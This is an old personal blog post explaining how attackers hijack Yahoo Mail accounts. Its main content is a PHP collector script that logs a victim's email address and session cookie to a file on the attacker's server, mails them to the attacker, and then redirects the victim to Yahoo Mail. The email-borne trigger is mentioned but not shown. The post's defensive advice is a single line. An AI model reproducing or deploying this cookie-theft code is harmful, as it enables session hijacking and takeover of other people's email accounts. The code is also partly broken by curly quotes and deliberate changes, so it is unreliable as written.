How hackers steal or hack Yahoo Passwords....

Posted by Shashank Krishna Thursday, January 15, 2009


sharethis: This article is meant to provide more info on how to protect your yahoo account and every account in general and should not be used for stealing someone’s info, password etc. It’s purely informative.


I did a search on this new thing that they use, it had to be something on the “client side”, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet - it’s easyer to attack than to deffend they say.

It didn’t take me too much to find this code which writes the recipient’s cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victim’s yahoo email.

The bug:

…which calls this php script:

$file=”cookie.log”;
if (isset($_REQUEST[”id”]) &&isset($_REQUEST[”cookie”])){
$logcookie =$_REQUEST[”cookie”];
$logcookie =rawurldecode($logcookie);
$logemail = $_REQUEST[”id”];
$logemail =rawurldecode($logemail);
if (file_exists($file)){
$handle=fopen($file,”r+”);
$filecontence=fread($handle,filesize(”$file”));
fclose($handle);
}
$handle=fopen($file, “w”);
fwrite($handle, “$logemail -$logcookie\n$filecontence\n “);
//Writing email address and cookiethen the rest of the log
fclose($handle);
mail(”email”, “$logemail”,”$logemail\n$logcookie\n$filecontence\n”);
}

header(”Location:http://mail.yahoo.com”); ?> …which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly.

NOTE: The code is a little changed to make it hard to use without PHP knowledge.
How to protect yourself? My advice: DON’T EVER OPEN EMAILS FROM AN UNKNOWN SENDER

How hackers steal or hack Yahoo Passwords....

Share/Save/Bookmark
Subscribe

Spread Firefox Affiliate Button | edit post .

0 comments

Post a Comment

Are You Planning on Quitting Facebook? Why?

@Flickr

www.flickr.com

About Me

My Photo
Shashank Krishna
Bangalore, up, India
nothin much to say.........doin B.tech in IIIT allahabad loves bloggingn hacking.... :) and loooves blogging
View my complete profile

ads2

topads